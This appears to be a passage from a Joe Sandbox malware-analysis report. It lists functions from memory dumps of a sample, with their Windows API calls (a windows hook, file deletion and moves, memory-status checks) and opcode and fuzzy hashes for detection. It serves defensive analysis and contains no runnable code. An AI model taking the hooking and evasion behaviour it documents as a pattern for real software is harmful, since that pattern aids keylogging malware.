Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4487261a7d37c52645a1508d8bf408b73128047c8681a581da6a24a52aa838e7
Instruction ID: 84b4f344be6c934e713843cfe917c969cd8e2864c6cdd3ef076790299af388c9
Opcode Fuzzy Hash: 4487261a7d37c52645a1508d8bf408b73128047c8681a581da6a24a52aa838e7
Instruction Fuzzy Hash: 1B21F6B5D00249AFDB10CFA9D884ADEFBF4FB48310F14801AE918A7210D374A944CFA5

Function 065EA8C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 065EA943

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 1391f48f9b93e1c3f03ac8651976996f5d4283439116ab82b728c11811162899
Instruction ID: da2f2fc198f8902ea074f5ee77006fc100b96ec3f6fb918c7d552c554f3aa9b9
Opcode Fuzzy Hash: 1391f48f9b93e1c3f03ac8651976996f5d4283439116ab82b728c11811162899
Instruction Fuzzy Hash: 2C2135B5D002499FCB54CFAAC944BEEFBF9FB88320F14841AE458A7250C775A940CFA1

Function 065E7098 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065E711F

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 67ccf7cf944ac1f37775a173bf21338284502152f4500143ad1fc44cc75c4247
Instruction ID: 32285f86cd83ec5af007bc7654b398b8f6c4c823a2a17bb562c5ce04ea04f2c7
Opcode Fuzzy Hash: 67ccf7cf944ac1f37775a173bf21338284502152f4500143ad1fc44cc75c4247
Instruction Fuzzy Hash: 9321C6B5D002499FDB10CFAAD984ADEFBF8FB48320F14841AE914A7350D375A944DFA5

Function 00B9863B Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00B986D0

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 61bed89c3f4b97dc92c8beed147f5ac3c89361879efd883e1879b8f41c708ca3
Instruction ID: 8b909af1ba37a28ed182d4d20f6dd0e33cbcd7d39401e1f282e666ae951f2474
Opcode Fuzzy Hash: 61bed89c3f4b97dc92c8beed147f5ac3c89361879efd883e1879b8f41c708ca3
Instruction Fuzzy Hash: 8A2123B6C002489FCF10CF99D980ADEFBF1FF88320F24856AE818AB205C7355900CBA0

Function 00B98060 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 00B980D8

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 434587f029341bcecc4d0dac05d09604bce9f28512fdb267e06e6c0f645353c9
Instruction ID: 944bb094ec8353f4e6fee130ad478e993a1c35462dfd3e11c75da34f02c7f17a
Opcode Fuzzy Hash: 434587f029341bcecc4d0dac05d09604bce9f28512fdb267e06e6c0f645353c9
Instruction Fuzzy Hash: 1E2115B5C006598BCB10CF99C545BAEFBF4EF48320F14856AD818A7241D778A945CFA1

Function 065EA8C8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 065EA943

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8a5aed45611f438229075c27d3e4001750bd1fcb087475a6af6365adbd45672d
Instruction ID: c0fc9039d864fc43d5c188bbcb62cbe848e52669fe60fe15bbe50986fc19ab69
Opcode Fuzzy Hash: 8a5aed45611f438229075c27d3e4001750bd1fcb087475a6af6365adbd45672d
Instruction Fuzzy Hash: B02113B5D002498FCB54CFAAC944BEEFBF5FB88320F14842AE458A7250C775A944CFA1

Function 00B98068 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 00B980D8

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d1e420ff0ad034ed2e00fb97a0d114ffb43314cc5936de4e242b9cb2366e1ee5
Instruction ID: bf1a16b3de94fc5abbe51cd41ef05b8c99018b5272f800d5feeba5179ffa0983
Opcode Fuzzy Hash: d1e420ff0ad034ed2e00fb97a0d114ffb43314cc5936de4e242b9cb2366e1ee5
Instruction Fuzzy Hash: D61106B1C006599BCB14CF9AC544B9EFBF4FF48320F15816AD818A7240D779A944CFA5

Function 065E23A8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 065E2416

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c7b5e764751fc3de78a9171d630c247b606c95a4d1e5e71090be0a64619cbe4e
Instruction ID: 266aa885e4a71048c557f95c01ac25ead14e9e97746c3a68953e4fad874a26cf
Opcode Fuzzy Hash: c7b5e764751fc3de78a9171d630c247b606c95a4d1e5e71090be0a64619cbe4e
Instruction Fuzzy Hash: E51123B5C002488BCB24CF9AD844ADEFBF8EB88320F14841AE818A7600C375A544CFA1

Function 00B9F778 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00B9F7DF

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f1be5dede42517e81e30f74331d651c720d735a361e81045113ecbdaf06240e8
Instruction ID: 9fc11ae696d9609df3727ece8ef2df144c3097fc8f61ae06d9269024737910f8
Opcode Fuzzy Hash: f1be5dede42517e81e30f74331d651c720d735a361e81045113ecbdaf06240e8
Instruction Fuzzy Hash: E911F6B1C0065A9BDB10CF9AC544BDEFBF4EF48320F15816AD818A7240D778A944CFA5

Function 065E09A4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 065E2416

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6c088702bda8d7660aa9ceca8c60c8512773c2a08b1ce690530bc39e112b3eaf
Instruction ID: 9f1d5284e0240df8d8a1455be07f45d3ae4e36899ebb0faf279c8654b5661cfa
Opcode Fuzzy Hash: 6c088702bda8d7660aa9ceca8c60c8512773c2a08b1ce690530bc39e112b3eaf
Instruction Fuzzy Hash: 5D11F3B5C007498FDB24CF9AC444ADEFBF8EB88220F14845AD919B7210C375A545CFA5

Function 065E8B29 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 065E8B85

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4e2f237b446d05319bc4bbed1d3055990a8cf9c479f738c0426b69c54c2ae53b
Instruction ID: 12ba0900cf3091e707b7ad968e542e040bb36f03d556b92288496b968834206e
Opcode Fuzzy Hash: 4e2f237b446d05319bc4bbed1d3055990a8cf9c479f738c0426b69c54c2ae53b
Instruction Fuzzy Hash: 5711FEB58002888FDB20CFAAD845BDEFFF8EB48324F248459E518A7600C379A544CFA5

Function 065E8261 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,065E823D), ref: 065E82C7

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0d811124a035bd82da95f0545d6b2151b07bd2d13fb5af16b335666e72ba0e89
Instruction ID: 300c3e90a9db709db876eb01e97a4e689d88d4f2a5482bdceabeff8a931e1acd
Opcode Fuzzy Hash: 0d811124a035bd82da95f0545d6b2151b07bd2d13fb5af16b335666e72ba0e89
Instruction Fuzzy Hash: C51103B5800648CFCB20CF9AD844BDEFFF8EB48320F24845AE518A7640C779A544CFA5

Function 065E6E34 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 065E8B85

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b162d7657b7fd46b6282447912e11c2a3a1c274f460b59e4251e52f8c2b7a756
Instruction ID: e2a56706f60a1e942eec6b93ab6f28a0da15ef9c5292564604c45e781db238c4
Opcode Fuzzy Hash: b162d7657b7fd46b6282447912e11c2a3a1c274f460b59e4251e52f8c2b7a756
Instruction Fuzzy Hash: D21100B5C003488FDB60DF9AC444B9EBBF8EB48324F24845AE518A7200C379A944CFA5

Function 065E6CEC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,065E823D), ref: 065E82C7

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 73d0041cc36b408b11e833bf12175e28498848c447a295ed5f1467aa799a590d
Instruction ID: 6b4a56fe1cf899fa9ef61d1f1e8b2a154c91759b7ba62ce8412a904000118f20
Opcode Fuzzy Hash: 73d0041cc36b408b11e833bf12175e28498848c447a295ed5f1467aa799a590d
Instruction Fuzzy Hash: A31103B5800648CFCB24DF9AD844BDEFBF8EB58320F24845AE918A7240C775A944CFA5

Function 0663DB15 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0663DC71

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: b2913526c360ce07c52a49092440e2534e56dcacb9353714d8bc047f6cf646ec
Instruction ID: 28f02c69097491a8d2b0854178a4ab34d6a29bc3a4afa09d19eb2ae52c2cd49a
Opcode Fuzzy Hash: b2913526c360ce07c52a49092440e2534e56dcacb9353714d8bc047f6cf646ec
Instruction Fuzzy Hash: D741ACB0E106199FDF55DFA5D8857AEBBB6EF85300F244929E402EB350EB709842CB81

Function 066321ED Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0663233B

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 4823d0207855375591346ad15c4f4145360fb2a086647735317bcaff86c54c45
Instruction ID: 38a0512eb7c04c6cc8e8472e76514d5d8300dac2fa1d9c3939d22c846b836016
Opcode Fuzzy Hash: 4823d0207855375591346ad15c4f4145360fb2a086647735317bcaff86c54c45
Instruction Fuzzy Hash: D931F230B002158FDB49AB74DA6476F7BE6AF89710F244468D406DB395EF35CE42CB94

Function 06632200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0663233B

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 24df85818a005c4083b9319acc1a85e92bce80716fd75c50fadaf57209b4ab80
Instruction ID: db53663fad57f73da8bdd015e4cd916ad6d4cace6840be99427cc0cee1bfbe2e
Opcode Fuzzy Hash: 24df85818a005c4083b9319acc1a85e92bce80716fd75c50fadaf57209b4ab80
Instruction Fuzzy Hash: 4A31CD30B102158FDB49AB74DA6476F7BEAAF89700F244468D406DB3A4EE35DE42CBD1

Function 0663FBE0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0663FC30

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: d909f13ddd0da0bd06627f6f4690af23230009931b351f7701e8c5332f027fea
Instruction ID: a7148f72762d376011387ad5e2ce09a4e3e2015c94a5894705227eac1d46f7ae
Opcode Fuzzy Hash: d909f13ddd0da0bd06627f6f4690af23230009931b351f7701e8c5332f027fea
Instruction Fuzzy Hash: 28115B70F50224DFDB44EB789905B6E7BF5AF4C700F108469E91AEB3A0EB359D018B84

Function 0663FBDF Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

|, xrefs: 0663FC30

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 544ca3afdea569abe8e8769c0718dab431fb7ace0723965c3b72c853c4bb3284
Instruction ID: 57e7f9cf275320961f1b4fa15fd485053969a76946729745eff1d247539e1cf5
Opcode Fuzzy Hash: 544ca3afdea569abe8e8769c0718dab431fb7ace0723965c3b72c853c4bb3284
Instruction Fuzzy Hash: 25115B75F50220DFDB44EB78990576E7BF1AF4C700F104469E90AE73A4EB359D018B84

Function 06632379 Relevance: 1.0, Instructions: 1016COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967d70bb155a7ba2eca21cd00017a98febe864a32ecd80ee290ccc1a07940c7f
Instruction ID: 5d0bab1e956649b87dce3221feb8dc4dfff731eec74c67bc978c5e069babffd4
Opcode Fuzzy Hash: 967d70bb155a7ba2eca21cd00017a98febe864a32ecd80ee290ccc1a07940c7f
Instruction Fuzzy Hash: A7924434E002148FDB60DB68C594A5DBBF2FF49314F5484AAE44AEB365DB35ED86CB80

Function 06635E30 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d73f92f7d494fba7bb9dc1f84bea83d2c2facfcdca1606614a4f77e0161fd05
Instruction ID: 3d1086c1f79deaa6142b602bf44e1b637a49ffa32e853693920549624327231d
Opcode Fuzzy Hash: 0d73f92f7d494fba7bb9dc1f84bea83d2c2facfcdca1606614a4f77e0161fd05
Instruction Fuzzy Hash: E861A171F001214FDB559A7EDC8066FBAD7AFC4610B254439E80EDB364EE69DD0287D1

Function 06633EE0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5afb47afad382e296707f91c2fd915d999d60e8a9acf9a772aa5a137470314
Instruction ID: a1b908cda170ab2ae379c7925c98124d8799516c42d8bf7b528199d74014d335
Opcode Fuzzy Hash: 2a5afb47afad382e296707f91c2fd915d999d60e8a9acf9a772aa5a137470314
Instruction Fuzzy Hash: E9812D34B106198FDB54DFB9D59466EB7F2AF89300F108529E40AEB398EF74DC428B81

Function 06634200 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37785e095bfb0cde4b3b987a4a899a30b85b629f6086fc4a176b0e6a3b8af92e
Instruction ID: f35d337189db4acfb40a28018bdc84ad005b74715df818a8231e7355ef6cd449
Opcode Fuzzy Hash: 37785e095bfb0cde4b3b987a4a899a30b85b629f6086fc4a176b0e6a3b8af92e
Instruction Fuzzy Hash: 16914C74E102198BDF60DF68C890B9DB7B1FF89300F2085A9D549FB395EB70AA85CB51

Function 06634218 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdd02f44294fa72fbba40c2e798dedfe74513e311c6ce99851947edf7815eea
Instruction ID: 07fced5ea45a125e3bb3682fd5bd8775d5e6d60af4fdc68cd00063a402af5f58
Opcode Fuzzy Hash: dfdd02f44294fa72fbba40c2e798dedfe74513e311c6ce99851947edf7815eea
Instruction Fuzzy Hash: 0D911C74E106198BDF60DF68C880B9DB7B1FF89310F208595D549BB395EB70AA85CF90

Function 0663EB71 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfc04bfdbba573ba912fd3bcd6d12a058ec30e44f3ab7177331013a53d69493
Instruction ID: dc26e282495c90813d32457d6e4b8e0f83827bba6dd6cc1f365579ba04b1ddff
Opcode Fuzzy Hash: 8bfc04bfdbba573ba912fd3bcd6d12a058ec30e44f3ab7177331013a53d69493
Instruction Fuzzy Hash: 5C713E74A002198FCB54DFA9D994A9EBBF6FF88300F24846AE405EB355DB31ED46CB50

Function 0663EB80 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bcaa0f3765ccff45aa52b07380aaad59ecdd8a8b783dbb73266ac48ff1870c
Instruction ID: 9ce0d004205dfc4a998b6ec838785208c10b1e9cf40b287f4a6684be438669a0
Opcode Fuzzy Hash: 16bcaa0f3765ccff45aa52b07380aaad59ecdd8a8b783dbb73266ac48ff1870c
Instruction Fuzzy Hash: 20714D70A002199FCB54DFA9D990A9EBBF6FF88300F24846AE405EB355DB31ED46CB50

Function 0663F809 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6702eed3373af4aebf868bc6ef98e1fa7bd830dbed3085348b7bfd4183122e03
Instruction ID: 0be2971baf86da11e64351f42afcb1a84e346a15406a65e57485ce370ef09ede
Opcode Fuzzy Hash: 6702eed3373af4aebf868bc6ef98e1fa7bd830dbed3085348b7bfd4183122e03
Instruction Fuzzy Hash: 7451D031E10219DFDF54AF78E8946ADBBB2FF88315F10886AE106DB390DB358855CB81

Function 0663F5B8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bf87567c58cb90d93d11a386909bf5490147ac159bcd9f2298e1f7127e157c
Instruction ID: e382f4e64e46891ffde1ed8052ee8f0aea6ba42ffae53abba5df7cbeab09bf86
Opcode Fuzzy Hash: 39bf87567c58cb90d93d11a386909bf5490147ac159bcd9f2298e1f7127e157c
Instruction Fuzzy Hash: 3A51D870F301248BEFA0667DE99476F369AD789310F20442AE60ACB3A9DF78DC414792

Function 0663F5C8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e69f6b9b3ae6c6fb8f66d7ea2aefb499165e7ef43cc874bcb820d31bbebf29
Instruction ID: 81b385e5acdf049299e5895f634c3bc7a96676feca98f39315c2ed8f767ad2fa
Opcode Fuzzy Hash: 81e69f6b9b3ae6c6fb8f66d7ea2aefb499165e7ef43cc874bcb820d31bbebf29
Instruction Fuzzy Hash: 2051D970F301248BEFA0667DD99476F26AAD789310F20443AE60ACB3E9DF78DC414792

Function 066351D7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba34a993b0cbb933a043da406c17a277e46f2af2db00d1718d3f6cfc16f5ee3
Instruction ID: 4cb8f6118ecfff5f07c35a9655c24bd5dcb026d66291e2be07d0ea7ffc813817
Opcode Fuzzy Hash: 1ba34a993b0cbb933a043da406c17a277e46f2af2db00d1718d3f6cfc16f5ee3
Instruction Fuzzy Hash: A0518274E002258FEF718AA9C58077EBBB2FB45310F24882AE45BDB385D675DD41CB91

Function 06635058 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24df2cb1eded8d931341d657c19de0e516456e629dee7a9000050bfbf68220ff
Instruction ID: 2bfbbf5168605e5e13b381753aed9cc70b94273ec299011d8c787bf3e02201bd
Opcode Fuzzy Hash: 24df2cb1eded8d931341d657c19de0e516456e629dee7a9000050bfbf68220ff
Instruction Fuzzy Hash: 6B416D71E0071A9FDF70CEA9D880AAFFBB1FB85310F10492AE156D7650D331A9558BD1

Function 0663FCA8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abc45b0e61ecbea6cf4f737233ca25fca10c584c10da5d510993e3e8ef6ac38
Instruction ID: bd4def1adb4bc48613ff829a117c8f854f9118dc954c624a304c6447244f171f
Opcode Fuzzy Hash: 5abc45b0e61ecbea6cf4f737233ca25fca10c584c10da5d510993e3e8ef6ac38
Instruction Fuzzy Hash: 7A419230E106168BDB60DFA9D58469EF7B2EF89310F108929E806DF354EB74A845CB41

Function 066320B1 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45034dd51ae8eab2ab8b3468f1d69100a905533f5a2f030b4cc720e22cc3782
Instruction ID: 4a26d6e7c40c650ca7befa3bb778b8a43469aff29df04448012d7facf21da753
Opcode Fuzzy Hash: c45034dd51ae8eab2ab8b3468f1d69100a905533f5a2f030b4cc720e22cc3782
Instruction Fuzzy Hash: 2C317E35E102158BCB45CFA4DAA569EB7F6FF89300F14C529E906EB354DB71AD42CB40

Function 066320C0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3b5a38b6f4007784fb74856601261b0d763edc0292106e0e26849013d347ca
Instruction ID: 87971c9ef66042c21883b882f773f9688bfa7996b63563e15ba6bd6b12c7e8b0
Opcode Fuzzy Hash: 0e3b5a38b6f4007784fb74856601261b0d763edc0292106e0e26849013d347ca
Instruction Fuzzy Hash: C7318F34E102159BCB04CFA4DAA469EB7F6FF89300F508529E906EB354EB71ED42CB80

Function 06633AE9 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac71c64b68b996d93f016c75357df47d1ed78d2be4ab551195fcbd12cb59001
Instruction ID: e33af112a67f81e7c1b80a989a017cb3251c737ec7e8a6e2f9de4c8ddae9781e
